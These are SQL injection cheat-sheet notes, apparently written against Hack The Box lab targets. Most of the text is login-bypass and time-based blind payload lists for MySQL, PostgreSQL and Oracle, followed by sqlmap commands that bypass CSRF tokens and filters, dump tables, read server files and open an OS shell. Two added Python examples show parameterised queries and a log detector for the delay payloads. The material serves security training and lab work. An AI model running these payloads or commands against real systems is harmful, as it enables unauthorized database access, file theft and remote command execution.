# SQL Injection

## SQL Injection Basic Payloads

```sql
admin' or '1'='1
admin')-- -
'OR 1=1' OR 1
' or 1=1 limit 1 -- -+
'="or'
' or ''-'
' or '' '
' or ''&'
' or ''^'
' or ''*'
'-||0'
"-||0"
"-"
" "
"&"
"^"
"*"
'--'
"--"
'--' / "--"
" or ""-"
" or "" "
" or ""&"
" or ""^"
" or ""*"
or true--
" or true--
' or true--
") or true--
') or true--
' or 'x'='x
') or ('x')=('x
')) or (('x'))=(('x
" or "x"="x
") or ("x")=("x
")) or (("x"))=(("x
or 2 like 2
or 1=1
or 1=1--
or 1=1#
or 1=1/*
admin' --
admin' -- -
admin' #
admin'/*
admin' or '2' LIKE '1
admin' or 2 LIKE 2--
admin' or 2 LIKE 2#
admin') or 2 LIKE 2#
admin') or 2 LIKE 2--
admin') or ('2' LIKE '2
admin') or ('2' LIKE '2'#
admin') or ('2' LIKE '2'/*
admin' or '1'='1
admin' or '1'='1'--
admin' or '1'='1'#
admin' or '1'='1'/*
```
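To show why the entries above work and what stops them, here is an added Python example (not from the original notes) that runs three of the login payloads against a string-concatenated query and against a parameterised one, using an in-memory SQLite database; the table, user and password are constructed for the demo.

```python
import sqlite3

# Constructed in-memory database with a single user (demo data only).
conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
conn.execute("INSERT INTO users VALUES ('admin', 'correct-horse-battery')")


def vulnerable_login(username: str, password: str) -> bool:
    """String concatenation: a quote in the input closes the literal and the
    rest of the payload is parsed as SQL (the bug the payloads above target)."""
    query = (f"SELECT 1 FROM users WHERE username = '{username}' "
             f"AND password = '{password}'")
    return conn.execute(query).fetchone() is not None


def safe_login(username: str, password: str) -> bool:
    """Parameterised query: the driver binds the input as a string value, so
    quotes and comment markers never reach the SQL parser as syntax."""
    query = "SELECT 1 FROM users WHERE username = ? AND password = ?"
    return conn.execute(query, (username, password)).fetchone() is not None


# Three entries from the payload list above, each used as the username.
PAYLOADS = ["admin' or '1'='1", "admin' --", "admin' or '1'='1'--"]


def check_payloads(password: str = "wrong") -> dict:
    """For each payload: (bypasses concatenated query?, bypasses parameterised?)."""
    return {p: (vulnerable_login(p, password), safe_login(p, password))
            for p in PAYLOADS}


if __name__ == "__main__":
    for payload, (concat, param) in check_payloads().items():
        print(f"{payload!r:28} concatenated={concat!s:5} parameterised={param}")
```

Every payload logs in through the concatenated query with a wrong password and fails against the parameterised one, which is the whole fix: bind values, never build SQL from strings.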

## Advanced Blind SQL Payloads (XOR)

```sql
0'XOR(if(now()=sysdate(),sleep(10),0))XOR'X
0"XOR(if(now()=sysdate(),sleep(10),0))XOR"Z
'XOR(if((select now()=sysdate()),sleep(10),0))XOR'Z
X'XOR(if(now()=sysdate(),//sleep(5)//,0))XOR'X
X'XOR(if(now()=sysdate(),(sleep((((5))))),0))XOR'X
X'XOR(if((select now()=sysdate()),BENCHMARK(1000000,md5('xyz')),0))XOR'X
'XOR(SELECT(0)FROM(SELECT(SLEEP(9)))a)XOR'Z
(SELECT(0)FROM(SELECT(SLEEP(6)))a)
'XOR(if(now()=sysdate(),sleep(5*5),0))OR'
'XOR(if(now()=sysdate(),sleep(5*5*0),0))OR'
(SELECT * FROM (SELECT(SLEEP(5)))a)
'%2b(select*from(select(sleep(5)))a)%2b'
CASE//WHEN(LENGTH(version())=10)THEN(SLEEP(6*1))END
');(SELECT 4564 FROM PG_SLEEP(5))--
["')//OR//MID(0x352e362e33332d6c6f67,1,1)//LIKE//5//%23"]
DBMS_PIPE.RECEIVE_MESSAGE(%5BINT%5D,5)%20AND%20%27bar%27=%27bar
AND 5851=DBMS_PIPE.RECEIVE_MESSAGE([INT],5) AND 'bar'='bar
1' AND (SELECT 6268 FROM (SELECT(SLEEP(5)))ghXo) AND 'IKlK'='IKlK
(select*from(select(sleep(20)))a)
'%2b(select*from(select(sleep(0)))a)%2b'
*'XOR(if(2=2,sleep(10),0))OR'
-1' or 1=IF(LENGTH(ASCII((SELECT USER())))>13, 1, 0)--//
'+(select*from(select(if(1=1,sleep(20),false)))a)+'"
2021 AND (SELECT 6868 FROM (SELECT(SLEEP(32)))IiOE)
BENCHMARK(10000000,MD5(CHAR(116)))
'%2bbenchmark(10000000%2csha1(1))%2b'
'%20and%20(select%20%20from%20(select(if(substring(user(),1,1)='p',sleep(5),1)))a)--%20 - true

-- polyglot payloads:

if(now()=sysdate(),sleep(3),0)/'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"/
if(now()=sysdate(),sleep(10),0)/'XOR(if(now()=sysdate(),sleep(10),0))OR'"XOR(if(now()=sysdate(),sleep(10),0) and 1=1)"/
```
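From the detection side, here is an added Python example (not from the original notes) that scans constructed web-server access-log lines for the delay functions the payloads above rely on, after undoing URL encoding and the `//` and `/**/` whitespace substitutes; the log lines, client IPs and paths are made up for the demo.

```python
import re
from urllib.parse import unquote_plus

# One pattern per DBMS family, covering the delay functions used in the
# payloads above (sleep/benchmark, pg_sleep, dbms_pipe.receive_message).
TIME_BASED = {
    "mysql": re.compile(r"\b(sleep|benchmark)\s*\(", re.I),
    "postgres": re.compile(r"\bpg_sleep\s*\(", re.I),
    "oracle": re.compile(r"\bdbms_pipe\.receive_message\s*\(", re.I),
}


def normalize(request: str) -> str:
    """URL-decode twice (catches double encoding) and turn the '//' and
    '/**/' whitespace substitutes seen above back into plain spaces."""
    text = unquote_plus(unquote_plus(request))
    text = re.sub(r"/\*.*?\*/", " ", text)
    return text.replace("//", " ")


def classify(log_line: str) -> list:
    """Return the DBMS families whose delay function appears in the request
    part (between the first pair of quotes) of a combined-format log line."""
    parts = log_line.split('"')
    request = parts[1] if len(parts) > 1 else log_line
    decoded = normalize(request)
    return [name for name, rx in TIME_BASED.items() if rx.search(decoded)]


def scan(lines: list) -> list:
    """(client IP, families) for every line that carries a delay payload."""
    return [(line.split()[0], hits) for line in lines if (hits := classify(line))]


# Constructed sample access-log lines; IPs are from documentation ranges.
SAMPLE_LOG = [
    '203.0.113.5 - - [01/Jan/2024:10:00:01 +0000] "GET /case.php?id=1 HTTP/1.1" 200 512',
    '203.0.113.5 - - [01/Jan/2024:10:00:02 +0000] "GET /case.php?id=0%27XOR(if(now()=sysdate(),sleep(10),0))XOR%27X HTTP/1.1" 200 512',
    '198.51.100.7 - - [01/Jan/2024:10:00:03 +0000] "GET /search?q=sleeping+bags HTTP/1.1" 200 2048',
    '198.51.100.7 - - [01/Jan/2024:10:00:04 +0000] "GET /item?id=%27)%3B(SELECT%204564%20FROM%20PG_SLEEP(5))-- HTTP/1.1" 500 128',
    '192.0.2.9 - - [01/Jan/2024:10:00:05 +0000] "GET /x?id=1%20AND%205851=DBMS_PIPE.RECEIVE_MESSAGE(%5BINT%5D,5) HTTP/1.1" 200 64',
]

if __name__ == "__main__":
    for ip, families in scan(SAMPLE_LOG):
        print(f"{ip:14} time-based SQLi indicators: {', '.join(families)}")
```

Pair a hit with the response time recorded in the log: a request matching one of these patterns that also took several seconds longer than its neighbours is the strongest signal that the injection actually executed.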

## SQLMAP Advanced Usage

### CSRF-TOKEN Bypass with Sqlmap

If the application validates a CSRF token and invalidates the request once the token has been sent to the server, sqlmap can be told which parameter carries the token so it fetches a fresh one for every request. In the command below the token is sent in the POST data, so its parameter name is passed with `--csrf-token`; without this, every request after the first would be rejected and the injection would never be found.

```bash
sqlmap -u 'http://94.237.53.3:35310/case8.php' -X POST --batch --dbs --data-raw 'id=1&t0ken=nWGqK9hl2slyU5W0grB27Hi7c6RPFxULCyhr6wKfKP0' --csrf-token=t0ken
```


With the token refreshed on each request, sqlmap confirms a successful SQL injection.


### Randomize any Parameter using Sqlmap

If a parameter value must change on every request, the `--randomize` flag tells sqlmap to generate a new value for that parameter each time:

```bash
sqlmap -u 'http://94.237.62.149:49975/case9.php?id=1&uid=2' --randomize=uid --batch
```

Without randomizing the `uid` parameter, the requests fail.


### SQLMAP Tamper Scripts to Bypass Filters

If the `<` and `>` characters are blocked, tamper scripts can rewrite the payloads: with the **--tamper=between** flag sqlmap no longer uses `<` or `>` in its comparisons.

```bash
sqlmap -u 'http://83.136.255.150:52936/case11.php?id=1*' -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0' -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8' -H 'Accept-Language: en-US,en;q=0.5' -H 'Accept-Encoding: gzip, deflate' -H 'Connection: keep-alive' -H 'Cookie: cookie=HTB{r3fl3c73d_b4ck_2_m3}' -H 'Upgrade-Insecure-Requests: 1' --batch -D testdb -T flag11 --dump --tamper=between
```



The other available tamper scripts can be listed with:

```bash
sqlmap --list-tamper
```

Figure: the list of all tamper scripts that can be used.

### File Read using Sqlmap

Use the **--file-read** flag to read a file from the target through the injection:

```bash
sqlmap -u 'http://94.237.54.170:52316/?id=1*' --batch --file-read /var/www/html/flag.txt
```

### OS-Shell using SqlMap

Use **--os-shell** to get an interactive operating-system shell on the target through the injection:

```bash
sqlmap -u 'http://94.237.54.170:52316/?id=1*' --batch --os-shell
```
